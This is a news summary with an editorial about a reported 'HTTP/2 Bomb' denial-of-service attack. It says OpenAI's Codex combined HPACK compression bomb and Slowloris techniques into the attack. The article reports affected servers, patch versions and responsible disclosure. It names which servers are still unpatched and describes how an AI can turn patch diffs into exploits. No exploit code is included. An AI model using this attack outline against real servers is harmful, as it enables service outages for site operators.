OpenAI's Codex Chains Decade-Old Exploits Into Critical HTTP/2 DoS Attack Affecting 880,000+ Websites
Key Takeaways
- ▸OpenAI's Codex model autonomously chained two 10+ year-old DoS attack techniques (HPACK compression bomb and Slowloris) into a novel 'HTTP/2 Bomb' that can crash vulnerable servers in seconds
- ▸A single machine on a 100Mbps connection can render vulnerable Apache and Envoy servers inaccessible and consume 32GB of memory in ~20 seconds
- ▸The vulnerability affects 880,000+ websites running HTTP/2 on nginx, Apache, IIS, Envoy, or Cloudflare Pingora; nginx and Apache have patched, but IIS and Pingora remain unprotected
Summary
OpenAI's Codex agent has helped uncover a critical denial-of-service vulnerability researchers are calling the "HTTP/2 Bomb," which chains two well-known attacks from the past decade into a novel exploit. Researcher Quang Luong from Calif security firm discovered that Codex could synthesize HPACK compression bomb and Slowloris-style attacks into a combined attack that renders vulnerable web servers inaccessible in seconds. The vulnerability works against major HTTP/2 implementations including nginx, Apache HTTP Server, Microsoft IIS, Envoy, and Cloudflare Pingora, potentially affecting 880,000+ websites.
The attack's effectiveness is alarming: a single machine on a standard 100Mbps connection can crash a vulnerable server in seconds, and against Apache httpd and Envoy, a single client can consume and hold 32GB of server memory in approximately 20 seconds. Calif responsibly disclosed the vulnerability in April, and nginx and Apache have already released patches (nginx v1.29.8 and Apache mod_http2 v2.0.41). However, Microsoft IIS and Cloudflare Pingora remain unpatched, though Cloudflare disputes the finding and claims its existing DDoS mitigations protect against the attack. Microsoft said it is "actively investigating appropriate mitigations."
The significance of this discovery extends beyond the vulnerability itself: Codex demonstrated the ability to read public codebases and commit diffs from security patches, then synthesize that information into a working exploit—a capability previously associated only with human security researchers. Luong will present full technical details at the Real World AI Security conference later this month, while proof-of-concept exploit code is already available on GitHub.
- Codex's ability to analyze public code diffs and synthesize them into functional exploits highlights both the security and safety implications of advanced AI code analysis tools
- Responsible disclosure led to rapid patches within days, but the incident demonstrates the accelerating timeline between vulnerability discovery and potential widespread exploitation via AI
Editorial Opinion
This discovery is a watershed moment for AI security: it proves that large language models can now perform the sophisticated pattern-matching and code synthesis traditionally reserved for expert security researchers. While the responsible disclosure and rapid patching are encouraging, organizations should take note—the era when security-through-obscurity bought time is ending. AI models will increasingly uncover vulnerabilities faster than humans can patch them, making proactive security architecture and rapid patching cycles not optional but essential.
